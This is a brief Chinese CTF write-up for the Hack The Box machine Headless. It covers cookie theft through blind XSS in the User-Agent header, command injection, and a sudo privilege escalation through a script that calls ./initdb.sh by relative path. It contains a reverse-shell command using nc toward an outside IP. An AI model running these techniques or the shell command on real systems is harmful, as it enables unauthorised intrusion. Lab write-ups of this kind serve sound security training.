Table of Contents
Season 4 #
Headless-Easy-Linux #
先扫端口
22/tcp open ssh
5000/tcp open upnp
5000开了一个web,扫到一个401响应的/dashboard路由
页面提供了一个support功能,应该是打xss
Message处插入xss会弹错误
那这个框的位置可以插xss并让后台bot访问吗
在User-Agent处插payload,将message设置恶意字符引出报错
拿到了admin的cookie,带cookie访问/dashboard
一个命令注入,分号分割拿到第一个flag
弹shell,完整shell
;nc 10.10.16.16 7777 -e /bin/bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo权限
Matching Defaults entries for dvir on headless:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User dvir may run the following commands on headless:
(ALL) NOPASSWD: /usr/bin/syscheck
syscheck的内容
1#!/bin/bash
2
3if [ "$EUID" -ne 0 ]; then
4 exit 1
5fi
6
7last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
8formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
9/usr/bin/echo "Last Kernel Modification Time: $formatted_time"
10
11disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
12/usr/bin/echo "Available disk space: $disk_space"
13
14load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
15/usr/bin/echo "System load average: $load_average"
16
17if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
18 /usr/bin/echo "Database service is not running. Starting it..."
19 ./initdb.sh 2>/dev/null
20else
21 /usr/bin/echo "Database service is running."
22fi
23
24exit 0
找不到initdb.sh这个进程时会执行,将flag写入文件
